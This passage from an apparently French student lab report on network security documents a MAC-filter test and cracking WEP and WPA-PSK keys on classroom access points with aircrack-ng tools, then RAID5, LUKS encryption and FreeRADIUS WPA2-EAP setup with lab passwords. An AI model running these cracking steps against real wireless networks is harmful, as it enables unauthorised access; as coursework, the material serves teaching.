Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:jjlddnssec.png]]&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
Nous refaisons les mêmes actions que pour le crackage de clef WEP.&lt;br /&gt;
Cette fois nous essayons de cracker la clef WPA sur cracotte03.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wpa wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 13 -w crackWPA wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous avons lancé ceci sur le eeePC qui a une vitesse de traitement 5 fois inférieure à celle d'une zabeth environ (environ 5h de traitement). Puis nous obtenons le résultat suivant:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                   Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [04:32:42] 12399908 keys tested (759.63 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399903 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 33 2B 69 DD 95 0A 5A E0 01 22 7E FF 98 DA 99 87 &lt;br /&gt;
                       40 7A CB CC 8A E5 32 9F FE 4E 5C 44 91 38 13 93 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 70 EE 27 96 5B 34 B5 4F 06 A1 F2 B6 A7 16 1E 21 &lt;br /&gt;
                       7A 0B BD F4 13 67 5B 4C ED 30 A9 0D 91 E3 F9 7F &lt;br /&gt;
                       88 E6 12 68 9C 77 4B 48 EB 5E 6A 5A DD 1D D9 08 &lt;br /&gt;
                       36 40 94 7D B4 05 80 B2 60 FA 84 81 50 CE DC 87 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 83 03 24 AC 39 AB 67 E7 7B C4 40 E8 6B 6D 7D 47 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Réalisations ===&lt;br /&gt;
==== Sécurisation des données ====&lt;br /&gt;
&lt;br /&gt;
Nous créons d'abord 3 nouvelles partitions, que nous associons à notre VM en modifiant le fichier GreenArrow.cfg :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-1 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-2 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-3 -v&lt;br /&gt;
&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-1,xvdd,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-2,xvde,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-3,xvdf,w',&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite installer mdadm :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install mdadm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 qui représente le RAID5 de partitions&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon oct 13 11:34:23 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon oct 13 11:34:23 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 0&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis nous sauvons cette dernière afin de conserver md0:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mkfs /dev/md0&lt;br /&gt;
mkdir /datamd0&lt;br /&gt;
mount /dev/md0 /datamd0/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être surs que la partition soit encore montée après le reboot:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/md0 /datamd0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vim testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous mettons en commentaire la 2ème partition dans le fichier de conf, puis redémarrons la machine:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon oct 13 11:34:23 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon oct 13 11:45:01 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 4&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       2       0        0        2      removed&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls /datamd0/&lt;br /&gt;
testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour rajouter la partition, on la decommente dans le fichier de configuration et on procede au rajout de cette partition au raid de la facon suivante:&lt;br /&gt;
&lt;br /&gt;
 mdadm --add /dev/md0 /dev/xvde&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours:&lt;br /&gt;
Suppression de la partition xvdf:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La partition est bien supprimée:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remet la partition:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On peut ensuite constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@IMA5-BANANE:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===&amp;gt;.................]  recovery = 18.2% (191112/1047552) finish=0.4min speed=31852K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@IMA5-BANANE:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 20.0% (210764/1047552) finish=0.4min speed=30109K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@IMA5-BANANE:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 21.8% (229836/1047552) finish=0.4min speed=32833K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@IMA5-BANANE:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.6% (626140/1047552) finish=0.2min speed=29816K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@IMA5-BANANE:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.3% (989688/1047552) finish=0.0min speed=30124K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@IMA5-BANANE:~# [  446.720069] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous vérifions grâce à Gparted que la carte SD fournie comporte une seule partition.&lt;br /&gt;
Une fois ce test passé, nous regardons grâce à dmesg où est localisé la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# dmesg&lt;br /&gt;
[...]&lt;br /&gt;
[1126726.403767] mmcblk1: mmc1:59b4 NCard 14.7 GiB&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre carte SD se situe donc sur /dev/mmcblk1.&lt;br /&gt;
Nous faisons donc un chiffrage AES avec un hashage SHA256 de la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons alors renseigner un mot de passe pour crypter la clef.&lt;br /&gt;
Ensuite, nous ouvrons la partition Luks, puis nous formatons la carte :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
root@zebrasoma:/# mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous montons la partition, puis créons un fichier sur la carte :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
root@zebrasoma:/# vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons la carte SD et fermons la partition Luks :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# umount /mnt&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksClose crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous essayons ensuite d'accéder à la carte SD. En renseignant un mauvais mot de passe, une erreur apparaît.&lt;br /&gt;
Cependant, une fois le bon mot de passe renseigné, tout re-devient possible.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;br /&gt;
Tout d'abord, nous installons FreeRadius sur notre machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous renseignons le login et le mot de passe pour se connecter à la borne Wifi : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
GreenArrow Cleartext-Password:=&amp;quot;glopglop&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne E306 et E304 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
client E304 {&lt;br /&gt;
	ipaddr		= 10.60.1.4&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''', puis nous rentrons en mode configuration : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aaa authentication login eap_greenarrow group radius_greenarrow&lt;br /&gt;
radius-server host 193.48.57.162 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
aaa group server radius radius_greenarrow&lt;br /&gt;
server 193.48.57.162 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_GREENARROW&lt;br /&gt;
vlan 3&lt;br /&gt;
authentication open eap eap_greenarrow&lt;br /&gt;
authentication network-eap eap_greenarrow&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 3 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_GREENARROW&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 3&lt;br /&gt;
bridge-group 3 subscriber-loop-control&lt;br /&gt;
bridge-group 3 spanning-disabled&lt;br /&gt;
bridge-group 3 block-unknown-source&lt;br /&gt;
no bridge-group 3 source-learning&lt;br /&gt;
no bridge-group 3 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
